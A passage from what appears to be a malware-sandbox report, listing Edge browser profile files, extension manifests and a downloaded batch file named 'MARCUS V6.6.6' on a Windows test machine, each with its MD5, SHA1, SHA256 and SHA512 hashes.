| SHA1 | a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d |
| SHA256 | dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60 |
| SHA512 | cd5822bbf91e8f7f5ab2b471a4bf8b464bde95465e2fccc6a57e5a287ca55d5062bdd6d4b3cd76f8529ee7a9081b6a7aad7dc2a7581c344ce4fd2d3256bdf451 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 3c9a014e99da4692a52a4a0cac5c6861 |
| SHA1 | 796e222022ab199eb0625be1bf5a4a813b941605 |
| SHA256 | bcca782ab1ed409ae127005ebc1634544bbcdc12326f2b0f2dce2fba96e75b81 |
| SHA512 | 28ca90e69b91ce3bb47f535fc5f07ca81fc02c27b0b2ac7be019a294e23496469f5479b9f210a61703e55b651feb8787945d055e73b999708ea9215e0394fa44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 53c7852504c426a0e396efb07e24beb9 |
| SHA1 | b2d667154a735abb4861c86973de222e7bf13349 |
| SHA256 | d7fb074ec935334e2cad466e3bd1cd167d62173c0290aeebf7a814ad094908e8 |
| SHA512 | b109f01150fabf3f5c986e2a0d800636a29f42701d276a7c3c39a7b2484b92fea75ae686bfb3d6cc0e60c7526347e9cf3f6cfa4bbfe0628ea83d30a40a3dee8d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57cda0.TMP
| MD5 | 763c68576cf180c251b124a510cbfe41 |
| SHA1 | f31d31f423fb63340021954bba6ec02c8fb5183f |
| SHA256 | 9dd2ea9ea9badf94b83c0d053452cd50e6bf4536b10ad869ee8e5befa2e7396e |
| SHA512 | 24350848a4364daaed5f97fadcfc98e46f0dc7c1f38eae8f36da6e3c7925f971daf8111164e312830fd7c9c0d940005d1bf77a5ff07c3decc8481c5124e2fb58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ecfe92074b008887c549ba61f4aee0f3 |
| SHA1 | fd79aac8050b0f4152fedc528ec3257299468b01 |
| SHA256 | 64333202eeb42a4b7beed97c2829f3cc63c2a03b3bf1edbe04573eb297bd7985 |
| SHA512 | 4f4bc0a0d38bef00eaf9bfa179870213e2915c43391f0cb79b7abee0db8478d7e26d74de4b254ded703f8179e2cecef209fc37b761ca19d310bceb26fd3c87ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 1f0554b5dbda292d49ab53877b0fdc67 |
| SHA1 | 1f061892b25d98de31b0d9e5de0fccdf7b04ab5b |
| SHA256 | 4a3d3e646d6d893a6c84f4703f5984529cf46fc5057b29af6c91220382701020 |
| SHA512 | 7e22f2e1db2d38c8acb3fce9bc5340e9dedc53092ed4091fc33746496e858bc48128640285240d0ed6e96805967ce41ae0d5976be22cd5b651d5330296e35223 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | ab79fc6f26a662e69b4d278321f08bd7 |
| SHA1 | 17227002230b3652feb23de460646cc1055e5c73 |
| SHA256 | f297d4c6ec995fa61255d49b14ebabafa331c3ea06ddf3a5ba74758d41b4305e |
| SHA512 | ae8eed24fea764f19926f9ba7d34b8fc11bc8e29852b9f25e11a7e0e7bfd459037e26d2bdec137d29d9cbc29a32fcd4ac13362ce4dc7dd3ad972b33cad16a9ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
| MD5 | 3f8927c365639daa9b2c270898e3cf9d |
| SHA1 | c8da31c97c56671c910d28010f754319f1d90fa6 |
| SHA256 | fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2 |
| SHA512 | d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | c18475a405bff1922ca859c0c7624b2b |
| SHA1 | ec2a81ad389ce994bb037107020fd5e901e537a6 |
| SHA256 | c72dd533c544638f91b32780b03d166808245a2d423bc6cc06e6c4c3fecbc450 |
| SHA512 | 8f8693273df42df9efedcfaa6bd1ef15ba4ed529d74a25b6443177600c94899539bda81783a963afd21e31c380b1788f67932a08b243cf104b5cd96882400fef |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1284367089\manifest.json
| MD5 | c3419069a1c30140b77045aba38f12cf |
| SHA1 | 11920f0c1e55cadc7d2893d1eebb268b3459762a |
| SHA256 | db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f |
| SHA512 | c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1284367089\LICENSE
| MD5 | ee002cb9e51bb8dfa89640a406a1090a |
| SHA1 | 49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2 |
| SHA256 | 3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b |
| SHA512 | d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e43f473b23fff68ca2c3cb994a15dd68 |
| SHA1 | 3429f2d536f30eb6fec4cdebbdb12753aab434e2 |
| SHA256 | 83214621a11f866497158dcbd171b5838798ba2bac0e15a897ce20bac65e29b9 |
| SHA512 | 97371b309c5d76737d8ba7fb1fd6d4a76966777cd92d9dbf56b667176aa03b31a48f06b0f0d0a794d4302fbc90a97cdbe914d54cc78a608096d0a63ae70e4204 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 00a1750fee285153f57bc190ba3da1c6 |
| SHA1 | 5796661cb02e7c66c3084303209c77797b67343b |
| SHA256 | cd56c698878a3b7ddd18ab268aa13d646d6a0f8abb49ae26eac2f075148c6239 |
| SHA512 | 07933899227136cf4adb1a65f9455a78555af75a6b309d65aff9ecf4339589b7765b45694fdb08651ae093594c1385aee58e0ec0c3245e081332d991428074f0 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1300582806\manifest.json
| MD5 | 778202dc964e7fb0ab5bed004f33fb14 |
| SHA1 | 932ed013275e2c1172575885246c937c7cca87af |
| SHA256 | 4474f08d1718da148ddb55aeb998886c053f6539c2fee3b3b1796f3855792ff9 |
| SHA512 | 9105af9928af4bcceb2cdc2161137ef6b07f4b97d663bbf27086f80dd266e967a5524aa5aec3f457493a0c4b98aa092aac6bd5062e72cbd4d939402c92093948 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_762581888\manifest.json
| MD5 | a0fedd9b29991ae92455f05414e5fa74 |
| SHA1 | 300c53982db6bc2bf1875a8e85518e93b94d1f15 |
| SHA256 | e3fede606090dcfbb6446f4da29cb6ef3afe7d0b0c8faeff52f7feb2557fdfc8 |
| SHA512 | 63ce6bd825cb611f34ae5d3a71eee40af7afc460d5a6ece59d4bb86d37a38a9e6a519d30adb720ddedf332754a3ba5f44b578cac3a610ecb8182c0ac3912615b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.5.1.1\typosquatting_list.pb
| MD5 | 45b4f63711eaa89d9c9792be8b19c2b1 |
| SHA1 | 59c28d96b19377751accf132f1c42557e2e1fa8c |
| SHA256 | 9144637db432c2e17209b2893ba67278fd1acdad9231096674caf7a6b4236253 |
| SHA512 | 43902e07f6eca8141d458e84d1fc136d850cdf1551597993099de6e2496d29686f8f93263be94abe023588ef5f979533d3e1baf29688c992bc902eea550f8256 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1096096730\manifest.json
| MD5 | b721bdf2924d658186ac8868dbd2c008 |
| SHA1 | 914aacc65bb7933bd73aa06f8bd2ca0b04de3858 |
| SHA256 | dc6a19395ad3a24ee3805f6e90c6b16fdc141a51ac7fbb99fb784e423f8962f3 |
| SHA512 | 4c1c16f714a2e2436697bc801f7e2f684010c833e3d5fe6ed68d6f3e630afa495412ea5a1b46f4bbbb1102feede84e72f32686910492510cbce71888a85b5fda |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 16a3f9a135918cc5e707687d71b25bc1 |
| SHA1 | 150d393105656ab2da282598c31997570e9031d0 |
| SHA256 | 69fabcc5aecfc882f156393a9f750df6064d308e70cc985733b640e399e3edcd |
| SHA512 | f6688fdace7a3e733b2d1bcadbf0a2b21f1474af64546aa232e10f6a8e4d5d70c666ac2e02fe4e1bea86ecab37ecb9191a0a1685bc8bd499fe0771ce30b337a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 40e118c25f09ec5b0e8dc47cc504e654 |
| SHA1 | a22a78d48561192b1b2edd6d8dc0cb7818c24937 |
| SHA256 | 8416789467c9855685399e91ba85c838d62092d5f6fcf38acc7862a2be892fc1 |
| SHA512 | 3dae29580674e3985eaea0382cdcf26278b502039efc1469358edc478ba8376f0449be3ae26dadd8327ff49b9fe82222d203d6b58d489661329463b557c15c3b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3c205eaa1fa4c70a53fc682cee644f46 |
| SHA1 | 097e38954ddcfdc4f8ef2c218e65a241d4921932 |
| SHA256 | be7f529ea2933f32c728d64179b68e514bb3bdd76507efe86f605f6e3b74c953 |
| SHA512 | af2f108f81dffc3e822f39042434ea910c14741c1704d27505cecab79f763f82c7d7983f0af25f248d7954a7e8f2df2f122f2a4aa233978874dce75a77c6e5f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9adddde7559ebb0d4d4e45796922af1c |
| SHA1 | 14072eb37afae482321680406325d57c797ab57e |
| SHA256 | 7f2bdb3bb6ec8ac4a2855248cd87152e55adcb5d39742d1ebdda77ad09787543 |
| SHA512 | d68811a2e26b3c9dc29aeb203aa0704998c134bf67666a8235b1a841e4e03ed3dbfff936a8e7834c547e3c5b67e989806af5afd05146a1514beab122b3b41d7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | ea648cc2d4c92f5710082fd874819e57 |
| SHA1 | 893a72a77ced19049433f6cac3473e7db1832937 |
| SHA256 | 2886b96d53d0439ce9cb14cdc157865846e40dd3b8308a0ca3665b89f68c9ad0 |
| SHA512 | e6d6e4c26d756b08efc87d84f6f456fc6061efe71601c25355fe313051f0c1e4f91213cacefb7e9272a0de520697430684d74878b5bce80e19be17b5cad2a507 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe5a3327.TMP
| MD5 | 1c6e9bde1a150b43dc34831f5cdbef75 |
| SHA1 | 30ecda5509a187e1156e7ac20241874dc51d13b5 |
| SHA256 | 77b2a48499cfa40733425ff3f4042dc7b5fc7eff5e16e6e8bd8ab115a6eea21c |
| SHA512 | 338ca2a0a8f32f3f0da6bc4f65d843a2c7da2b0f4ce8a9942a8394bf6b99d7d7cbca5f2b258106dd5470208b1f72270c94a9c3ad988e77a36dc7e519e583886f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0d1a87e66aff9848_0
| MD5 | 077d3289c0ad1fe7fa9932887cfe12e6 |
| SHA1 | 04b9f1ef39ac3de100add5681c171d8e40431488 |
| SHA256 | cf384c11221c2f72319974356aeef1be8cdbe05a66a2700565bf0a57736bff6c |
| SHA512 | 391827f68ca7af248cc1a11be4d32eb45e814c2dadcbd9dd1d95ddb18a4cbd6e4e8b2f4d0eb6229a19e8f2b19f9c1cb9ffb58e379e9ec0e344ef8c855ca05fc3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d97a1479ef8e9adccb8901468f83e2d7 |
| SHA1 | 8f4d9d916f072139ebc821d57a525b0a0b5dc879 |
| SHA256 | 60a2de71f10258cd441d100067a25fb393344304bc66ca294e4c0151ffccae54 |
| SHA512 | d16e7bb382ddc0e79e7d181eb694251379d65f784e6313721362a470d0e658d4bbded9283ebe0e476d9bb8dcb841d297e9ffd183d9b27f7442f0479bcddabd64 |
C:\Users\Admin\Downloads\MARCUS V6.6.6 (1).bat.crdownload
| MD5 | b60fc6f6d510b82a30cbfe4b9077d884 |
| SHA1 | 44c0eef3499c25b5ae1dd121cce632be7867838f |
| SHA256 | cceeb92860e76b890cb6157660921a57ea21e9a3d94605d7596875e0626304bf |
| SHA512 | 0d92beb96bd58879c79d001192b287e8a75ef821f02edbcc15404e81a87e8b5f86c29e7820514280d046f20bf08fb4be7bb43cbf39c9bbcadcd4eeb363e6cffa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 14da9a7f0b3bc08b83581c90dd4f878c |
| SHA1 | 4b9f61db35e815efb800feed5eb5854b52fc293c |
| SHA256 | 1ba5128f146d642380b1132b60a5276c1026ec1c8f4949fc3a1d2232e17438a2 |
| SHA512 | 360308b175b270cb3b2f44c0d161f92e88827733f49dc24f2a6b61829f60cdbdf1860caa36ecb2f965671e5e2ae389a597832c181b50ea7f00de0fdb4a619cb5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2e7a4bb53b7cffb6302ef6de5738ff8f |
| SHA1 | fca5b0420af8fb4747b6c30860e626e7acde8bda |
| SHA256 | 809d1addfd82be7c16207f9e8c50ac8c021d66cfea4bb05530a94570771a4554 |
| SHA512 | 2dbe0e4a38ae773cb4d44678b34b89fe0cd1f010d7c10b1678b1fdf6bcc6c1b7fcd63902ea0c5e51330aa710b96efb211d669772e545aba67d550d38539dcdd9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c9dcd637968f913b5306c8dd1145297e |
| SHA1 | 76ed6b8a983981b6c552ba02c9ebb50138e6fc96 |
| SHA256 | 1b657ef4fdad2ea02b1ecd04cd90058155c09e8265a95f1ac2a0718d30b0ff99 |
| SHA512 | b37d41254b599d3836573513e4a797c39d7591aea54692998f16520624d4f1379d5d8cebfd3f062e65d2a56c469c3bdec1fd25d912e95e9b71ed902e45402be4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 76e2849cbf1f424200bee2943f4507d2 |
| SHA1 | a929fffd41746f36ff0c767323b223aebd2bfc6a |
| SHA256 | 595e170e0625e2558372dae080145950fe037ce6d6bca60802da6dae8562c44d |
| SHA512 | 01e32237debf22afd5ee892b3172b7e3e3fd1a67481be9a448087bee6a04df7ced9ad858813220d940f8005bd2779dfd2007e179df14168550b9b2af4e500552 |